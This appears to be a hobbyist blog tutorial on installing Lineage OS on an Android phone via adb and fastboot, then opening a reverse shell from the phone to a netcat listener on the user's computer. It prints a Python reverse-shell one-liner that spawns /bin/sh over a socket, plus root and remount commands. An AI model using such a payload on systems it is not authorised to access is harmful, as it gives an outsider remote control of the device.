How to set up a reverse shell on your Android device

In this post we’ll set up a reverse shell on the Lineage OS Android distribution, but same can be achieved on other distros as well.

First, let’s see how to install Lineage OS on your device. Feel free to skip this section if you’re not interested.

Jailbreak and install Lineage OS

Before you start, you may need to jailbreak your device. Once you’ve done that, follow the steps below to install Lineage OS.

Step 1. Find your device here.

Step 2. Download the builds. For example, for a Moto G7, the builds are available here.

Step 3. Download adb and fastboot and extract the files somewhere on your system. More info here. For example, for Linux, the zip file is available here. Once you have the executables, enable USB debugging on your Android device, connect it to your computer and run adb devices You should see the device on your terminal.

Step 4. Restart the device in fastboot mode by running the command: adb -d reboot bootloader

Step 5. Once the phone boots up, run the command fastboot devices. You should see the device listed there. If you haven’t unlocked your device, now it’s the time to do it. The Lineage OS website will have the link that you need. For example, for Motorola it’s this one.

Step 6. Now that you’re in fastboot mode, we can start installing the images you downloaded at Step 2. Make sure they’re in the same folder as your adb and fastboot executables. Now run the command fastboot flash boot boot.img. When it’s done, reboot your Android system and select the Recovery option.

Step 7. Make sure that your partitions are consistent by following the steps outlined here. Basically, you download this zip file, select ApplyUpdate -> Apply from ADB on your Android device and then from your terminal run this command adb -d sideload

Step 8. Reboot the device, select Recovery mode, then Factory reset -> Format data / factory reset. When it’s done, go back to the main menu, select Apply Update -> Apply from ADB, then run this command on your computer: adb -d sideload lineage-<version>-<build_number>-nightly-<phone_codename>

You’re done installing the OS, now let’s have some fun 🙂

Start a reverse shell on your Android device

You already have a browser, but we need one more thing. (Optional) Visit the F-Droid website on your Android device and install the app.

We’ll need Termux, which is a terminal emulator and a Linux environment app. Open the F-Droid app, search and install the Termux app. You can also install it straight from the Termux website. This will give you access to a lot of Linux executables.

Open the Termux app and run the command pkg install python

Let’s start setting up our reverse shell.

Step 1. Connect your phone, enable USB debugging and run adb devices. Once the device shows up there, we’re ready to start. Set up netcat on your computer (nc -lvp 8448). From here on, we’ll assume your computer’s IP is Change it to reflect your computer’s address.

Step 2. If you want to have your filesystem fully writable, run

adb root

adb shell mount -o rw,remount /

If you don’t need to, just run adb shell

Step 3. On the Android device, go to where termux has the python executable installed. Try cd /data/data/com.termux/files/usr/bin or run the command find / -name termux to locate the Termux’s folder. Now it’s time to connect set up the reverse shell. For this, run the command:

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",8448));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

You can find more python payloads here.

Go back to your terminal and voila. You have the reverse shell 🙂